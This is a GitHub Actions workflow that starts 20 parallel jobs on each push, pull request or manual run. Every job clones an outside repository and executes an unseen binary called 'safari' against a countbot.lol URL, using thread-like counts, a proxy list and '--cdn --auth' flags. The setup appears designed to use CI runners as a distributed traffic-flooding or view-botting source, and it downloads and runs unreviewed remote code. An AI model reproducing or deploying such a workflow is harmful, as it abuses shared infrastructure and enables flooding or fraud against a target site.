name: Run Script (20 Parallel Instances)

on:
  push:
    branches: [ main, master ]
  pull_request:
    branches: [ main, master ]
  workflow_dispatch:

jobs:
  run-script:
    runs-on: ubuntu-24.04
    strategy:
      fail-fast: false
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19,20]
    
    steps:
    - name: Checkout code
      uses: actions/checkout@v4

    - name: Convert line endings and run safari (Instance ${{ matrix.instance }})
      run: |
        git clone https://github.com/Kiwiwjkwi/cuddly-octo-bassoon.git
        cd cuddly-octo-bassoon
        chmod +x safari
        ./safari    https://countbot.lol/6901966783-dbf677e7-f00a-4700-aa40-a75ed46a5435 400 10000 8000 proxies.txt --cdn  --auth 
    
